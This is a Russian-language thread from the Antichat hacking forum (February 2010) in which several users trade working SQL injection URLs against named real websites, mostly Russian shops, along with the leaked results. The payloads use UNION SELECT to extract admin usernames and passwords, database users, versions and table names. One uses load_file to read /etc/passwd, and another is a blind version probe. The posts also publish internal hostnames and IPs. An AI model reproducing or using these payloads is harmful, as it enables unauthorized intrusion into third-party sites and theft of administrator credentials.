ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11451  
Старый 04.02.2010, 16:21
Аватар для sqlinjector
sqlinjector
Новичок
Регистрация: 31.12.2009
Сообщений: 19
Провел на форуме:
60679

Репутация: 10
По умолчанию

Вот решил еще одну инъекцию ру сайта выложить
Цитата:
http://www.postsoviet.ru/page.php?pid=-85+union+select+1,2,3,4,group_concat%28user%28%29, 0x3a,database%28%29,0x3a,version%28%29%29,6,7,8,9, 10,11,12,13,14,15,16--
user: u12625_postsov@10.9.11.66
DataBase: u12625_postsov
Version: 5.0.67-log
 
Ответить с цитированием

  #11452  
Старый 05.02.2010, 01:15
Аватар для shell_c0de
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404

Репутация: 564
Отправить сообщение для shell_c0de с помощью ICQ Отправить сообщение для shell_c0de с помощью AIM
По умолчанию

RU shop's
Цитата:
http://gps-k.ru/show_cat2.php?grid=-1+union+select+concat_ws(char(58),username,passwor d)+from+admin
http://www.interiorportal.ru/show_cat2.php?grid=-1+union+select+concat_ws(char(58),username,passwor d)+from+admin
http://www.pianino.ru/show_cat2.php?grid=-1+union+select+concat_ws(char(58),username,passwor d)+from+admin
http://www.freesound.ru/show_cat2.php?grid=-1+union+select+concat_ws(char(58),username,passwor d)+from+admin
http://www.velomastera.ru/shop/show_cat2.php?grid=-1+union+select+concat_ws(char(58),username,passwor d)+from+admin
http://www.maxpaintball.ru/show_cat2.php?grid=-1+union+select+concat_ws(char(58),username,passwor d)+from+admin
http://www.paintballworld.ru/show_cat2.php?grid=-1+union+select+concat_ws(char(58),username,passwor d)+from+admin
http://hwdecor.ru/show_cat2.php?grid=-1+union+select+concat_ws(char(58),username,passwor d)+from+admin
http://www.realshop.lv/show_cat2.php?order=name&catid=&grid=-1+union+select+concat_ws(char(58),username,passwor d)+from+admin
http://www.sambolessons.borec.ru/show_cat2.php?grid=-1+union+select+concat_ws(char(58),username,passwor d)+from+admin
http://www.allmaster.ru/show_cat2.php?grid=-1+union+select+concat_ws(char(58),username,passwor d)+from+admin
http://www.topi-top.com.ua/show_cat2.php?grid=-1+union+select+concat_ws(char(58),username,passwor d)+from+admin
http://inet-mag.com.ua/show_cat2.php?cou=v&grid=-1+union+select+concat_ws(char(58),username,passwor d)+from+admin
http://shindaiwa.ru/show_cat2.php?grid=-1+union+select+concat_ws(char(58),username,passwor d)+from+admin
http://www.stamps-shop.ru/show_cat2.php?grid=-1+union+select+concat_ws(char(58),username,passwor d)+from+admin
http://www.podokonnik.ru/show_cat2.php?grid=-1+union+select+concat_ws(char(58),username,passwor d)+from+admin
http://svt-i.ru/show_cat2.php?grid=-1+union+select+concat_ws(char(58),username,passwor d)+from+admin
http://www.infostend-shop.ru/show_cat2.php?grid=-1+union+select+concat_ws(char(58),username,passwor d)+from+admin
http://www.licom-moscow.ru/show_cat2.php?grid=-1+union+select+concat_ws(char(58),username,passwor d)+from+admin
Одминко www.site/admin/
 
Ответить с цитированием

  #11453  
Старый 05.02.2010, 15:13
Аватар для Seravin
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию

Код:
http://reviews.techloop.net/review.php?id=-1+Union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,version(),27,database(),29,user(),31,32,33,34,35,36,37,38,39,40,41+--+
version: 5.0.67
database: techloop_db
user: techloop_db@localhost
 
Ответить с цитированием

  #11454  
Старый 05.02.2010, 16:33
Аватар для SEWERN
SEWERN
Участник форума
Регистрация: 09.01.2009
Сообщений: 155
Провел на форуме:
2253612

Репутация: 94
По умолчанию

Код:
http://www.nawaonline.com/home.php?id=-2/**/union/**/select/**/1,concat%28username_admin,0x3a,password_admin%29,3,4/**/from/**/admin_log_cp--

http://www.alzoma.net/home.php?id=-2/**/union/**/select/**/1,concat%28username_admin,0x3a,password_admin%29,3,4/**/from/**/admin_log_cp--
 
Ответить с цитированием

  #11455  
Старый 05.02.2010, 17:45
Аватар для Seravin
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию

Код:
http://www.renegaderecon.com/review.php?id=-1+union+select+1,2,3,4,5,6,7,8+--+
database:renegaderecon
version:4.1.14-Debian_5-log
user:renegaderecon@salt.dreamhost.com
 
Ответить с цитированием

  #11456  
Старый 05.02.2010, 19:32
Аватар для А®ТеS
А®ТеS
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
Провел на форуме:
1537850

Репутация: 536
Отправить сообщение для А®ТеS с помощью ICQ
По умолчанию

Водка:
Код:
http://www.vodkabaikal.ru/gallery.php?pacode=13&phcode=-1+union+select+1,unhex(hex(concat_ws(0x3a,user(),version(),database()))),3,4,5,6
root@localhost:4.1.10a:baykal
file_priv=Y --->
Код:
http://www.vodkabaikal.ru/gallery.php?pacode=13&phcode=-1+union+select+1,load_file(0x2f6574632f706173737764),3,4,5,6
Тоже водка:
Код:
http://visota.artinside.ru/foto_uch.php?code=-1+union+select+1,2,unhex(hex(concat_ws(0x3a,user(),version(),database()))),4,5,6,7,8,9,10,11,12,13,14,15
u22850@10.10.223.212:5.0.67-log:u22850

Код:
http://vladimirmorozov.ru/portfolio/index.php?id_parent=-1+union+select+1,2,3,4,unhex(hex(concat_ws(0x3a,user(),version(),database()))),6,7,8/*
mvstudio_vm@lex.hc.ru:4.1.18:wwwmvstudioru_vm

Код:
http://dfrealty.ru/showhousecart.php?code=224+and+ascii(substring(version(),1,1))=53--
chr(53) == '5'; ---> пятая ветка

P.S. Все сайты одной студии, дырявы, как решето.
 
Ответить с цитированием

  #11457  
Старый 05.02.2010, 23:15
Аватар для SEWERN
SEWERN
Участник форума
Регистрация: 09.01.2009
Сообщений: 155
Провел на форуме:
2253612

Репутация: 94
По умолчанию

Код:
http://dirac.phys.ncku.edu.tw/stats/?year=kaMtiEz&month=tukulesto&mday=-15+union+all+select+@@version,user%28%29--

5.1.37-1ubuntu5
 
Ответить с цитированием

  #11458  
Старый 06.02.2010, 01:43
Аватар для .:[melkiy]:.
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию

PR: 0
ТИЦ: 10

_http://www.playonline.com.ua/game.php?id=208)+union+select+1,2,concat_ws(0x3a,v ersion(),user(),database()),4,5,6,7,8,9+--+
 
Ответить с цитированием

  #11459  
Старый 06.02.2010, 13:09
Аватар для whynotbar
whynotbar
Новичок
Регистрация: 13.10.2009
Сообщений: 1
Провел на форуме:
2442

Репутация: 0
По умолчанию

Код:
http://aodaihanghai.vn/news_detail.php?lang=&menu=23&id=-93%20UNION%20ALL%20SELECT%201, 2,3,4,5,6,7,8,9,10,11,12,13--
Цитата:
Web Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 mod_perl/2.0.4 Perl/v5.8.8
Powered-by: PHP/5.2.8
Current DB: hangctl_adhh
Tables :

Цитата:
config,dangnhaphethong,dienthoai,dondathang,ech,gi oithieu,hethong,info,lang,lienhe,luottruycap,menu_ news,menu_quangcao,menu_sanpham,menu_sanpham_cap1, msn,nhomtin,quangcao,sanpham,skype,tbl_group,tintu c,tuvan,useronline,xdmt,yahoo
 
Ответить с цитированием

  #11460  
Старый 06.02.2010, 15:30
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.societatedurabila.ro/index.php?id=9+union+select+concat_ws(0x3a,version (),user(),database(),@@version_compile_os)



Database Version: 4.1.22-standard
Database name: holcim_new_en
User name: doru@localhost
Os: pc-linux-gnu
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ